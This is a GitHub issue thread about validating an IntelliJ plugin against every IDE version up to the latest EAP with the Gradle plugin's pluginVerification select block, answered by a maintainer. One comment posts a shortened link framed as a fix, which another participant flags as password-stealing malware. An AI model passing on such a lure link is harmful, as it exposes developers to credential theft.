### ISSUE TITLE
Make it possible to validate all IDE versions up until the latest EAP

### ISSUE THREAD

**Issue by AB-xdev** [JetBrains/intellij-platform-gradle-plugin#1765]
### Describe the need of your request

Use-case:
We want to check if a plugin is compatible with all latest minor IDE versions up until ``LATEST-EAP-SNAPSHOT``.

For example if our plugin is compatible with 241.+ we want to check:
* 2024.1.x
* 2024.2.x
* 2024.3.x (EAP)

---

In the ``IntelliJ Gradle Plugin (1.x)`` we had the following to do this:

``build.gradle``
```groovy
intellij {
    version = properties("platformVersion") // Reads system property
    // ...
}

listProductsReleases {
    sinceBuild = "241.*"
}
```

And in our CI we would execute the following
``./gradlew runPluginVerifier -PplatformVersion=LATEST-EAP-SNAPSHOT --info``

This would then results in the following checks:
```
...
[main] INFO  verification - Finished 1 of 3 verifications (in 1.2 s): IC-242.22855.36 against software.xdev.saveactions:1.2.4-SNAPSHOT: Compatible. 1 usage of deprecated API
[main] INFO  verification - Finished 2 of 3 verifications (in 1.3 s): IC-243.12818.47 against software.xdev.saveactions:1.2.4-SNAPSHOT: Compatible. 1 usage of scheduled for removal API and 1 usage of deprecated API
[main] INFO  verification - Finished 3 of 3 verifications (in 1.5 s): IC-241.19072.14 against software.xdev.saveactions:1.2.4-SNAPSHOT: Compatible
...
```

---

**How can this be achieved in the new plugin?**

I have currently run into the following problems:
* Using the [``select``](https://plugins.jetbrains.com/docs/intellij/tools-intellij-platform-gradle-plugin-extension.html#intellijPlatform-pluginVerification-ides) block to select the needed IDEs, however this is not working at all and always fails with ``Could not set unknown property 'types' for extension 'ides'...``<br/>Code looks like this:
  ```groovy
  // ...
      pluginVerification {
          ides {
              select {
                  types = [IntelliJPlatformType.IntellijIdeaCommunity]
                  channels = [ProductRelease.Channel.RELEASE]
                  sinceBuild = '241'
                  untilBuild = null
              }
          }
      }
  // ...
  ```
* It's not possible to automatically resolve ``LATEST-EAP-SNAPSHOT`` anymore. According to [the docs](https://plugins.jetbrains.com/docs/intellij/tools-intellij-platform-gradle-plugin-faq.html#how-to-check-the-latest-available-eap-release) this now needs to be done manually with the ``printProductsReleases`` task.

### Proposed solution

It would be nice if the use-case was somehow respected somewhere, because currently the functionality is just gone and very complex to rebuild.

The following should be at least fixed:
1. Make the ``ides#select`` block work again
2. Re-implement resolving ``LATEST-EAP-SNAPSHOT``

**Comment by AhmadMahmoodRana** [comment]
try this
https://bit.ly/4gwC82r
If you don't have the c compliator, install it.(gcc or clang)

**Comment by AB-xdev** [comment]
> [AhmadMahmoodRana](https://github.com/AhmadMahmoodRana)
> try this

Don't try it it's [malware](https://www.bleepingcomputer.com/news/security/github-comments-abused-to-push-password-stealing-malware-masked-as-fixes/)

**Comment by hsz** [comment]
I see you use Groovy (`build.gradle`) instead of Kotlin DSL (`build.gradle.kts`) – Groovy isn't the variant we focus on, but we try to provide a backward compatibility if possible.

The snippet you've posted is missing `it.` prefixes within the `select {}` statement:

```
import org.jetbrains.intellij.platform.gradle.IntelliJPlatformType
import org.jetbrains.intellij.platform.gradle.models.ProductRelease

// ...
    pluginVerification {
        ides {
            select {
                it.types = [IntelliJPlatformType.IntellijIdeaCommunity]
                it.channels = [ProductRelease.Channel.RELEASE]
                it.sinceBuild = '241'
                it.untilBuild = null
            }
        }
    }
// ...
```


The `select {}` feature fetches the available IDE releases from the JetBrains IDE Installers listing. Hence, it contains only the IDEs available for end-users to download through download.jetbrains.com or the JetBrains Toolbox app.

Using the `select {}` will match and get you _IDE installer_ variants of IDEs (they include JBR; see docs for more details).

Recently, I received a request to allow non-installer variants for plugin verification (#1715), which has already been implemented and will be available soon with the `2.0.2` release:

```kotlin
intellijPlatform {
    pluginVerification {
        ides {
            select { ... }
            ide(IntelliJPlatformType.IntellijIdeaCommunity, "LATEST-EAP-SNAPSHOT", useInstaller = false)
        }
    }
}
```
